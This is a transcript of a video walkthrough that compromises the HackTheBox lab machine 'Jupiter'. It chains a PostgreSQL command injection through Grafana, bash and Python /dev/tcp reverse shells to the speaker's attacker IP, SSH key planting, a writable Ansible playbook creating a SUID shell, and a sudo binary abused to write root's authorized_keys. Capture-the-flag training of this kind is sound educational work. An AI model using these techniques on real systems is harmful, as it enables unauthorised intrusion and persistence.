Hello everyone, welcome to another episode. In this video, we're gonna try to compromise a Linux machine on the HackTheBox platform. So let's head over to HackTheBox. The name of the machine is Jupiter. It's a medium difficulty machine. As I said, it's a Linux machine with this IP address 10.10.11.2.216. So first off, let's copy the IP address and go and start with our initial scans. We want to see the open and close ports. Actually, we are interested in the open ports. So we do an nmap dash scv. I can type scv. So C is for default script, and then V for to emirate versions, and then we do dash on. We want to save the output of our nmap command to a file. Let's call it nmap scans, and then let's specify a minimum rate of let's say 1000, and then we can just pop in our IP address, and this should start the scan. Let's see what we're gonna have. Okay, we are waiting. All right, so we have two ports open, port 22 and then port 80, which is HTTP. We have an Nginx server, so that's the web server running on Ubuntu. So also looking down, you can see the title did not follow redirect. It couldn't follow the redirect to the title of the page because of this subdomain. This domain actually wasn't, it's not part of our host file. So what we need to do is to first of all copy it to our host file. So we can open our host file, and what we need to do is just to add it to our host file so that we can follow the link. All right, so our IP is 10.10.11.2.1.6, and then we put the domain in there, save, and this should be okay. So now we can come and access this particular domain from our browser. So we do http, come on, so jupiter.atb. Let's see what we get. So okay, our landing page is something like a planet. I don't know if this is how Jupiter looks like, but this is yeah, this is the landing page. And then here we don't have much over here, so what we need to do is we need to actually look for subdomains of this particular domain. So we use GoBuster, and then vhost, and then the URL jupiter.atb, and then our word list we're gonna use opt share, let's say tools, and I think it's in payloads, and then sec list, yes, sec list, and then discovery DNS. Okay, so I think the subdomain, I think let's say 5000. Yeah, if subdomain 5000, this should be okay. And let's use thread of 100, and let's see what we get from here. So right, so we could see that we have a subdomain known as kiosks in the Jupiter.atv domain. So we need to add this one as well to our host file. So let's quickly copy it. Let's go back to our host file, and we pop this in and save. Then come back to our terminal. All right, so let's clear the screen, and now let's see what we can do. Let's try to visit this subdomain and see what it has. So kiosks.jupiter.atb. Okay, so I can see some Grafana. All right, so we have some Grafana windows here. It's actually showing us a lot of graphs. All right, so we can just look around to see what we can do here. So what I'll do is I'll try to intercept a request from this page. Let me open my web suite and grab a request and see whether we have some APIs or some interesting routes that we can take a look at, because we can't actually see everything here. but websuite should be able to give us a deep insight into what is going on the Grafana page. So, okay, let me enable my plugin, and then I'll capture the request. I'll intercept the request. So what I'll do is I'll just start, browsing on this particular page. Then I'll forward. So the first one is like it's an API to a dashboard and home. So I'll forward. I just want to see what is going on, all the routes that is accessing. So it accesses a Prometheus Grafana API. Okay, let's go ahead. Let's continue. Okay, we see some API DS and then querying. So this is like a data store query. Okay, let's proceed. We still have some queries. So I think this is all what is gotten to. We can stop the intercepts. We go to targets and we have most of the requests here. We have get requests. So let's look at this post request. This could be interesting. This is another post request. Okay, so this particular post request is doing some command like a database query. That's what you see, some select statement here from this post request. So it's like kind of an interesting API that we can take a look at. So let's send this to repeater. Okay, so in repeater, if you send the request, you get the post request. It brings back some data here, so that's okay. And then if we look at plugin ID, we can see some Postgres over here, so it gives us an idea about the kind of database we are dealing with. So this could be a um Postgres SQL database. So let's see what we can get. So this is doing a it's making a query request, and then it's getting the data. I don't think there's any kind of sanitization done here. So let's see if we can do some command injection. All right. So let's go and then look for Postgres command injection. Let's look for the payloads. Okay, let's see what we're gonna get. Okay, so payload of all things. Oh, that's what comes on top, so we can visit that one first. Payload of all things. And when we come down here, we can see some PostgreSQL command injection. I think this should be interesting. Let's try to visit this and then come back. Okay, we have to start taking some notes. We need to take some notes. So Sublime Jupyter notes.txt. So this is where I'm going to be putting my notes. All right. Then we come back here. So this is a Postgre command injection. So we see drop table if exists. This is optional. This is create table, then copy, and then you can see after the copy program, you can see an ID is trying to inject a command, the ID command into the target. So I think this should be something that we should try. So I'll copy this first part, and then let me go back to my notes, put it in here, then come back to the second part, which is actually gonna inject the command, and then we put it back here as well. So in terms of this command, the ID command, we can try to request for a reverse shell. All right, but before we do that, we need to put this one in bracket, sorry, in double quotes, and then we swap out this particular ID. We need something more ambitious, so we're gonna put in a reverse shell in there. So bash taxi, and then I'm gonna put this bash tag I, and I'm just gonna put this is a simple reverse shell. So def come on, def tcp, and then 10.10.15 is it 14 or 15? Okay, let me confirm. I don't know my my town 0 IP. So let's see what I have here. So it's 14.192. So dot 14.192, and then I'll be using port 111. That's the listening port I'm gonna use on my attacker machine. Okay, and then I'll do 0 and 1. Yeah, I think that should be it. So that's a simple reverse shell, but here we need to escape this double quotes. We need to escape the double quotes, if not the payload is not gonna work. All right, so this is what we're gonna try to do. I don't know if it's gonna work just off the bat, but let's try. Let's see if it works. So we come back here. So what I'm gonna do is to just try and get a simple reverse shell. Okay, so I'll use rwrap nc-lvnp 111. So that's the port we specified in our payload. Okay, so it's supposed to be n before p. That's why I didn't. All right, so that's fine. Now we are listening on our attacker machine. So let's try to execute this payload over here. So let's copy the payload. Okay, copying this payload, bring it back to our web suite. So instead of dear SQL query, we are going to put our own query. Okay, so this is what we want. All right, we are now in charge. So let's see if this is going to work. Yata, we have a shell. So that's great. Okay, so this is our initial foothold. We can do whatever we want to do, try to stabilize the shell, but it's like this shell is really unstable. So what we're gonna do is we are trying to create a key pair, RSA key pair. Okay, so that we can use private and public keys to authenticate ourselves with SSH. That's gonna give us proper SSH shells which we can work with. So what I'm gonna do is I'm going to use SSH. Come on, SSH keygen. Okay, let's see. So it's going to save our keys in postgre.ssh. All right, so we have to note where it's going to put these keys. So we're going to go back 2 times. So cd 2 times, and then we can list, and then we can see that our SSH keys are stored here. So we can see the into SSH, and then when we list, okay, we can see that we have our private key and then our public key. So what are we going to do with these private and public keys? So what I'm going to do is I'm going to create an authorized key file. So I yeah, so what I will do is I'm going to create an authorized key file, and then I'll input this public key in there. All right, so let's see. I don't have anything here for now, so let me just touch authorized keys. Okay, so if I list, I have authorized keys here, and then I'm going to store the public key over here into the authorized key. So I'll cut id rsa dot pub. Okay, so that is our public key. Come on, copy. Okay, and then I'll come here, Sublime authorized keys. So I'm gonna pop my key here and then save it. All right. So that's our authorized key. I'll actually have to transfer it in here. I'll need to transfer it in here. So I'll do that in a bit. But I'll also need the private key, which is the ID RSA. I'll need to copy this private key. So I'll cut ID RSA. So this is the private key. I can copy. I can copy. So let's copy this private key. Now come back here, and we need to create another key here. I don't know how we're gonna call this. So we're gonna call this one Postgre Pref. So this will stand for Postgre private key. Okay, and then we pop it in here, and then we save. Okay, so that's kind of saved. Then we need to give it some permissions. So shmode and I think it's 600 and then postgre yeah, so we're giving it the right permissions. Now what we have to do is we need to try and make we have to save the authorized keys in order to be able to download it from our target machine. So what I'll do is I'll come and save it below here. So I'll just use a Python 3 HTTP server. So this should be able to save the file. Then when I get back to my target machine, I can wget and then how do you call it? It was called authorized keys. All right, authorized keys. I think we should be able to. Okay, resolving what? Okay, so I think this we have to actually specify the source we are downloading the file from. So 10.10.14 dot 1 something something. Let me see again. What is it? Okay, 192. So we go back 192 and then port 8000, and then now we should be able to grab the file. So we see that the get request has come through, and then when we come back to this window, if we list, we have our authorized keys here. If we cut our authorized keys, let's make sure that we have something in there. Okay, we have the Postgre public key, so this should be fine for us to go. So now what we have to do is let's try and see if we can SSH into the target machine. So now SSH tag I, and then we use the pref, so Postgre pref, so we use a private key, and now the user is going to be Postgre. From here, this is the name Postgre, and then at jupiter.htb. So I hope we get a shell. I hope we were able to log into SSH. Oh, no way. It didn't work. What happened? Let's see if we have something was wrong with our keys. Our private key, was there something wrong with our private key? No. Let's see. Mm-hmm. Okay, let's try. Let's try again. Okay, so private key invalid format. We need to something here. Um, I don't know. Let's see. Try to think. Try to think about why public key. Okay. Okay. So we have our okay. Let's see. So user uh, Postgres. Is it Postgres? Oh, damn. I was spelling something wrong. Yeah, I think so. What was I was Postgres. Yeah, I didn't add the S. It's Postgres. Oh, my bad. But eventually, we've been able to. I was trying to think about what I was doing wrong because I think absolutely I was on the right path. Good. So now we have our full-fledged SSH shell where we can do our clear everything. We don't need to export any Python to stabilize our shell, so that's fine. So here I can just come and quit here as well, and I can even do another sorry SSH and then Postgres. I'm just trying to look for two shells so that we can have two shells at the same time. And Postgres. So this time I'm worried about the spelling. Jupyter.atb. Yeah, good. So we have this, we have that. So what do we do now? So if we see ID, we are Postgres. Who am I? I'm Postgres. But what can we do? Postgres, that's all we can do here. We don't have much access here. So we need to be able to uh, move laterally into a user who has much access to give us some kind of added access to the machine. So if we try to list slash home, we'll see the users that we have. We have Jovian and then we have Juno. All right. So we have these users here. What what I'm gonna do now is to see the processes running on the system to see if any of the user has a process running that we can try to use to move laterally. So I will use a PSPy, PSPY64. Okay, so this particular is saved here, so I'll just copy it into my file here, into my workspace here. So I'll copy this down here. All right. So now I have PSP4, PSPY64. All right. So now I can download because I'm already saving. So I should be able to download it again. And then I'll use wget. Come on, wget 10.10.14.192 8000 PSPY 64. Alright, so it's downloading the binary. So it's done. So if I list, I should be able to see my PSPY 64. So what I'm gonna do is to actually run this particular binary. Let me see. Let me list it and see if it's executable. It looks as if it's not, so let me change this permission. So make it executable and PSPY64. So since it's executable now, I should be able to run it and then see the output that it should be able to give me. So let's see what we are gonna get. Okay, so it's running, PSPY is running. So it's actually trying to see the processes that are running in an unauthenticated way. Okay, because some of the processes, before we see them, we need to be authenticated. We need to be privileged. But this particular binary is able to bypass that and make sure that we are able to see other processes running by other users without having the needed permissions. So that's cool. Okay, so it's running now. We we should be able to see some information at this time. Let's see. Let's try to search for slash home from the output here. Okay, so we don't have anything yet. So I'll just quit this. And then now, if we quit, we can see that slash home slash Juno. So this is the user called Juno. Okay, so the user Juno is running a particular file called network simulation.yaml. All right. So network simulation.yaml. So this user. So let's see what we can do with this. This is kind of interesting. So we can try to go to slash dev slash shm. So let me clear. So first of all, let me try to save this piece of information. Okay, so we can see also here Juno is actually executing this particular file, but this is where it is stored. All right, so it's in dev shm. So let's go in there. Let's clear and cd to start dev shm. Okay, and then when we list, we can actually see that the file belongs to the user Juno, but it's not properly configured. The permissions are not properly configured. You can see that everybody is world writable. Everybody can write this file. So let's see what is in there. So let's vim network simulation.yaml. All right. So in here, we can see it's kind of like an Ansible playbook file that is used to configure some services on I don't know what this actually does, but it's like an Ansible playbook. Okay, so we have a server here. So what we're just gonna do is try to manipulate it to do something, you know, simple for us. So what I'm gonna do is, let me go into insert mode. So here we have path. So and then we have args. So path, and then user bin, and then we will copy, and then the argument we're gonna throw in here is bin bash. So that's what we want to do. We want to copy this bin bash, and then we'll come here, and then we'll change the okay, we copy bin bash to temp and then bash. Okay, so that's what we're gonna do. We're gonna use this copy, and then these are the arguments. Okay, and then what we're gonna do is to change the mode. Okay, so we'll change the mode of um, let's say we are going to make it a suit binary, and then temp, and then bash. All right, so this is what we're gonna do. Let me see if everything is right in here. Okay, that looks right. And then that's fine. Let's see if our changes actually sticked. Yeah, so these are the changes that we just made. So we are copying the bash binary onto the temp folder, and then we are changing the permissions. Okay, so in that case, when we run it, we're going to run it with the privilege of the user Juno. That's basically the idea behind this kind of modification. So we can go into temp, and then when we list, there is nothing here yet. So let's see, we need to wait. We need to wait for the file to execute, the YAML file to execute. It's still not in here. Mm. Okay, so now it has executed, so we can see that it eventually copied it. So we can see the permission here. So okay, let's just list only that file. So ls then we list bash. We can see that the bash, it has the suit binary, and then the user is Juno. Good. So what we do now is we just do bash dash p, and so first of all, let's see who we are. So who am I? Who am I? I'm Postgres. So when we execute the command, so we execute this particular bash command, and then we give it a p switch, and then see that we've gotten a new shell. And if we check who we are now, we are Juno. So we've been able to do lateral movements. Okay, so ID Juno. So the ID is still Postgres, and is the EU ID, which is a Juno. All right. So if we want, we can try to get a proper shell again, because we cannot see all the groups that Juno belong because of the way we got the shell. If we want, we can do another SSH. I can generate another SSH keys to log in to get a full-fledged SSH shell. All right. So we can try to go to Juno's home. Maybe he has some already existing SSH keys. So Juno, so ls minus LA, he has SSH keys already, so we can cd into these keys. Okay, so he has authorized keys. Okay, and then let's see what we have in these authorized keys. Let's cut authorized keys. There's nothing in the authorized keys. So what we're gonna do is we are going to generate our own SSH keys from our PC. So let's hop back here and come down. So SSH keygen, and then I'll just call the file Juno Juno. Okay, let me say Juno keys. Okay, so these are gonna be the set of keys for the user Juno. list, I can see that I have a Juno private key and then Juno public key. So what I will do is I'll copy Juno's public key, this particular public key. I will copy it into the authorized key files, and then I will use this private key to log in. So let's see if it works. Alright, so I'll cut my Juno keys.pub. Okay, so this particular key, I'll need to save this. So I'll go back to Juno, let's authorize keys. So what I can do is I can echo this into oh come on, authorize keys. All right, so I'm going to echo this into the authorized keys file. So now if I cut authorized keys, my authorized keys are there, so that's fine. Now I can try to log in again, now with Juno private keys. So we have Juno keys, this is going to serve as the private keys. So I'll try another SSH and then Juno keys, and then this time around it's going to be Juno at Jupyter.htv. So if everything goes well, we should be able to log in as Juno. All right, that was perfect. That was perfectly fine. So we clear. So if we do who am I, is Juno. All right, this is a proper stable SSH shell. And then if you look at the groups as well, ID, so we can see that over here we are able to see all the groups that Juno belongs to. He belongs to a group called Science. All right, but we couldn't see that up here, even though if you do who am I, it's still Juno. But if you do ID, because the UID is still attached to Postgre, it's just the EUID, extended UID, which is Juno. So here we have a proper Juno shell, which we can work with. So Juno belongs to a group called Science. Well, we don't know what to do with this particular group, unless maybe we can think about, okay, what files are accessible to this particular group. So we can try to find out. So we use the find command and then group. The group is called Science, and then what else? The type of file. The type is going to be a file, and that should be it. So def now, so we should be able to see all the files that are accessible to the group called Science, and then we try to see which one is interesting to us. So we can see that the group actually, we have opt, solar flare, and then logs. You can see some log files in here. This should be kind of interesting to us. All right, so it means this particular folder is of interest, so we come back to this later, but let me just try and copy the most recent log file, which is 25th. This is 25th. Okay, yeah, so we will let me just copy all this and then we'll get back to it later. So what I'm gonna do is I'll copy these log files. So we know we have some log files in opt solar flares logs, so we'll come and check these ones later and see what are in the log file. We can actually see the log files actually contain tokens which you will need later on. So if we cut one of the log files, you can see some tokens. Okay, so these tokens, and then we have the tokens are accessible from localhost, and then in this port or on this port, so port 8888. So this port is local to the Jupyter machine, so we cannot access it. So what we can do, let's see. So if you do ss-lmpt, okay, we should say that it's listening. So this particular port is actually a listening port, and we should be able to see the service running on this port. But before we do that, or before we can do that, we need to do some port forwarding. We need to port forward this port, so we have to do some local port forwarding. All right, so where can I do this port forwarding? Let me do it on pane 2. So I'll exit from here. Okay, so the port forwarding, I could actually use a chisel, or I can just use a SSH own port forwarding, local port forwarding mechanism. So mostly, if you can do something locally, or if you can live on the land, so living on the land, so you can live on the land, that's fine. You don't need to import an external program to be able to do this port forwarding if you can do it locally. So I'm just going to use the local method. So I'm going to do a local port forwarding. So I can demonstrate here that we cannot actually access the, so if you do HTTP localhost 8888, you see that we cannot access anything here. All right, even with the proxy off, we still cannot establish any connection to that particular port, and so we need to do port forwarding. Yeah, that's what we need to do. So we do SSH tag L, so that's a local port forwarding. So we're gonna port forward 8888 localhost 8888, and then we have some keys. All right, so Juno keys, and then we're gonna use Juno at Jupyter.atv. Okay, this is what we need to do. So also, if we check here, I'm just gonna stop this Python server, and then if we do sslmpt, we see that we don't have any port 888 here, so it's not, you know, it's not port forwarded onto our local machine. Well, let's see after we run this command whether that will change. So if we run this command, okay, so let's come back here, let's clear, and then try and see again if, so you see that now we have the port forwarded to us, so that's a good sign. Now if we go back here and try to access this, voila, we have been able to access the Jupyter service over here, but it requires a token. All right, so what is the token that we're going to use here? So that's where we have to go back to these logs and then try to find the token. Okay, so let's see if we can find the exact token. If you're lucky, we should be able to see the token pretty easily, but if you are not, we have to try to brute force. Okay, so it was in what it was, let's see, it was in option logs. Okay, so this is the path, so I will cd to this path, and then I have my logs here. So let's say we are trying to ls minus l, let's clear first, ls minus l. So these are the log files, so we'll try to use the most recent, so that makes sense, that makes sense. Okay, so we'll try to, this is March, April, May, June. So June, And then this looks like the most recent 23rd June. So I think this should be the log that we need to be using. The token that we require should be here. So probably it's like the token keeps changing every day. I don't know how that gets done. So if you are lucky, this should be the token that we have to try and access. So let's copy this and then we put it here. So we can actually access this URL completely, or we can copy the token here and go and place it in the token field. So whichever is okay for you. But since we already opened the page without the token, we can just slap the token in here and see if it works. So voila, that was great. Good. So it has taken us to this Jupyter interface where we should be able to run some Python commands here and then see some results on the targets. All right. So what I'm gonna do is I'm going to start a new Python tray IPUI kernel. Okay. So here, this is what it does. Okay. So you can run a command here and then it will execute the command on our remote machine. Okay, so I'm actually going to run a Python reverse shell. That's what I'm trying to do. Trying to get a reverse shell from this. So which window can I use? So okay, let me close this. We need to use this window. Okay, so read on then nclvnp. Okay, 111. I like to use the port 111. Okay, so it's listening on port 111. So what do I do now? So what I can do is I need to import OS and then os dot system, and then I should be able to get my reverse shell. I can put my reverse shell here, bash tag c, and then bash tag I, and then we have dev tcp 10.10.14.192. I suppose, I hope I'm getting it right, 111. And then I think this should be it. All right, if everything goes well, this should be able to give us a reverse shell onto our target. It should be able to give a reverse shell. All right, so let's go back here and see. So now you can see that we are listening on port 111. And if we execute this, let's see. Oh wow, voila, voila, voila. Okay, good. So we have a reverse shell, and then we are the user Jovian. Jovian. So Jovian is the user here. So let's see what Jovian is doing. So all right. So ID is Jovian. Who am I? Is Jovian. So Jovian is in the sudo group. So we can do sudo takel, and we have Jovian can run this particular command without any password. Okay, so this is going to be our privilege escalation vector. All right, so what is this particular binary? What is it? What does it do? I don't know if we need to get another stable SSH shell, or we can just go ahead. I'm still thinking. What do we need to do? What should we do? Should we generate some keys? So let's see. Let's go to Jovian again and see if we can generate some SSH keys. So cd /home /Jovian. All right. So Jovian doesn't have any SSH keys. I don't know if we need that. Yeah, let's generate some more SSH keys or not. Yeah, let's do it. So SSH key gen. Okay. So we cd into .sh and then we have our public private key. So we what we need to do is to create an authorized key file. So let's see. So what we're gonna do is we're gonna cut our id rsa dot pub. So we're gonna cut this one. So let's do this. Come on, I can copy. Okay, so we're gonna echo this into authorized keys. Okay, and then we can cut the private key. So id rsa. So the key. We are doing a lot of public private encryption stuff today. That's great. So this should be it. Now we come back to our local machine, and then we use Sublime to, so this is Jovian Priv. So this is going to be Jovian's private keys. We save this and then we give it permission. So chmod Jovian Priv. Alright, so that's Jovian private keys. I don't think we need two Junos, so let me go up here. So this one I'm gonna exit out of the shell. Come on, exit, exit, exit. Alright. Okay, so we exited. So now let me make sure that the Jupyter machine is running, it's working. Okay, that's fine. Alright, so now we can do our SSH and then Jovian Prev, and then we're gonna log in as Jovian at Jupyter.htb. All right, so we are good to go. So this is now a proper shell for Jovian. So this is what we're gonna do with. Okay, so we do sudo tac l, and then Jovian is able to run this particular binary. So we can try to see what kind of binary it is. So let's file it and see. It's executable linkable file. This is an EFL file. So this is a Linux executable, just like exe in Windows. So all right, but this particular file is going to be like a binary data file. Okay, so we can use the strings to see if we were able to extract some kind of interesting files and folders or whatever this particular binary does. So we can string it. So strings, we pass it to strings, and strings is going to give us a whole lot of information, but what we're interested is in it's in config. Okay, so let's see. What's config? What is it saying? I'm trying to, okay, so what I'm supposed to do is to actually grep. Okay, so let's get a clean shell, and then I'll grep config instead. So that's what I'm supposed to do. So we can see that we have some interesting file here, temp config.json. So this particular config.json, well, what is it about? What does it have? So vim, let's try to read config.json. is empty. It doesn't have anything. All right. All right. That's cool. So we just exit out of here. But we know that it actually does something with config.json. Okay. And then so we can go to see the temp and see. So let's clear and then list. So we don't even see the config.json file here. All right. So what we can also do is we can try to find the file name. So the file is going to be named config.json. Okay, so it's like a JSON. Like we want to find all the config.json files on this particular machine and see if we can do anything to them. So config.json, and then the type is gonna be a file, and that should be it. Let's see. Okay, so it's like this is the location of the original config.json file. Okay, so what we're gonna do is let's look at the contents of the config.json file. Oh, so this particular file, we need to copy it onto the temp folder, and then we modify, we do some modification to it. But let's see what it contains. So let me vim it. No, not this one. The original. So this is the original config.json file. Okay. So we can say that it has root here, file here, and then this is the source. This is actually interesting. Okay. So what it does is it will grab a file from this particular source and then it will save it in this location. So basically that's what it does. Okay, so we need to try and see how we can circumvent this particular behavior to escalate our privilege. Okay, so let's exit from Vim. So what I will do is I'm going to copy this file. So copy this into temp and then config.json. So this is what I'm going to do. So now if we list, we should be able to see our config.json. All right, and then we have write permission, so it means we can modify it the way we want. If we cut config.json, so we can see that the original behavior is still the way it is. So we're gonna change this in a pretty short moment. So first of all, again, let's cut it and see what we're gonna do. Okay, so let's go into the file config.json. So what's okay? So in the machine, another user is trying to modify this config.json. So I'm not the only one. So it's like another person is working on this machine. So what I will do is I will just abort. Okay, I'll abort. But what I'll do is I'll copy this file onto my local machine, edit it over there, and then upload it. Okay, so that's what I'm going to do. Okay, cool. So how can I? Okay, so good. So I'll just cut it. Um, cut config.json. So this is the JSON file. Okay, good. So I'll come here and then sublime config.json. So this, I have a local copy of the config.json file. I can edit this, however I want and just upload it. So what I want to do is, so as I said, this is going to be the destination route. So whatever file is here is going to be copied over here, over to the root, and then this is going to be the file name. Okay, so what I want to do is I'll just do slash root slash dot ssh. Okay, so the root ssh. So and then the file is going to be called authorized keys. Okay, so that's basically what I want to do. I can delete this particular lines. So what I want to do is to upload an authorized key file onto the root.ssh folder. So basically that's all what I'm going to do. So the remote where I'm going to get the file from is I'm going to save it from my system. So I have to use my IP address 14192 and I'm going to save it on port 8000 and it's going to be called authorized keys. Just at it. So this should be all. This should be all of that. All of that. That's it. This should be all the um, this should be all the modification we need to do on the JSON file. Now let me come here. Let me list and see if I have an already authorized key file. Let me cut this authorized keys. Okay. All right. So what I'm going to do is, I need to generate some keys again. So generating keys over and over and over. So let me say SSH keygen, and then I'm gonna call it root root. Let's call it root keys. Yeah, that should be fine. I'll just call this root keys. Okay, so ls we have root keys. So if we cut root keys, so this is the private key. So root key dot pub. All right. So this is going to be our public root key. So I'll copy this and just replace it in my authorized key file. So sublime authorized keys. So instead of these old authorized keys, I'm going to put my new authorized keys. All right. So this is going to be the root authorized keys file. Okay. And then yeah, that should be it. So now what we need to do is to save it. So we need to make sure that so if I do ls, so this is the authorized keys, this is the config.json. So we need to actually grab these two files, not just this file, because this file is going to, when this config.json file runs, it will automatically grab this file and store it in the root.ssh folder as our authorized keys. All right, I think this sounds complicated, but I think if we go ahead, you should understand it. You should be able to get a better understanding of how it works. So I'm going to use Python again, Python http.server. So I'm saving all the files in here. Okay, and then what can I do? So I go back to my remote, my target machine here again, and I'll go to cd temp. So config.json. Let's cut it and see if someone does modification already. Cut config.json. Config.json. Let's see. No one has done any modification to it yet. So I'll just remove it because we are gonna download a new one. So if I list again, you can see that it's no longer there. So now we wget 10.10.14.192 8000 and then config.json. All right. So our file is now downloaded. So if we do config.json cat config.json, we should be able to see all what we're gonna do. So yeah, that's it. So what we have to do now is just run this command and it should be able to add our authorized key file into the root folder. So with that, we should be able to SSH in as root. That's basically what it's going to do. So we do sudo and then we run this command. Let me get a clean shell first. So we do sudo and then we run this command. So we have an error in the JSON. So it's like the config.json. Yeah, so there's a syntax error. So we need to remove this comma from here, and then we remove config.json again, and we wget we wget it again, and now if we do sudo and then we run it again, let's see what we'll get. So now you see that we have our authorized key files. The get has been done, so it has been fetched. Okay, so we assume that our authorized key file is now sitting in root/.ssh. Okay, so if that is the case, let me get a shell here. Let me exit from this Jovian. Okay, and then since it's there, if I list, I have my root key. So this is going to be my root private keys. So I'll just try to SSH in. So SSH and then so my root keys, and then this time around I'm going to SSH in as root at jupiter.atv. Let's see. Hola. Yeah, I'm root. So ID, I'm root. Who am I? I'm root. This was great. This was wonderful. So I have my root privilege. I can do whatever I want to do on the machine. That was very, very insightful. I did a lot of key generation. Okay. And then now that I'm root, mostly if I'm working on these machines, I always want the root file, the root shell. Okay. If I get root, I should be able to search and find wherever the flags are. That's not my problem. I just need a root. So now that I have the root, let's look for our flags, which we're going to submit to HackTheBox. So we just use find. So name, so user.txt. So wherever he is, it's gonna fetch him out. And then we have what? Okay, type. Come on, I can type file, and then that should be it. So there for now. Yeah, so the user file is over there, and then instead of user, I'll say root. Then I'll look for the root file. So the root is over here. So the user I can just copy, cut. So I have my user flag, and then I can cut my root, and then I have my root flag as well. So that's it. That's the end of the video. We've been able to compromise the machine. We got the root shell, and then we have the flags. So thank you so much for watching. We'll have more videos like this in the future.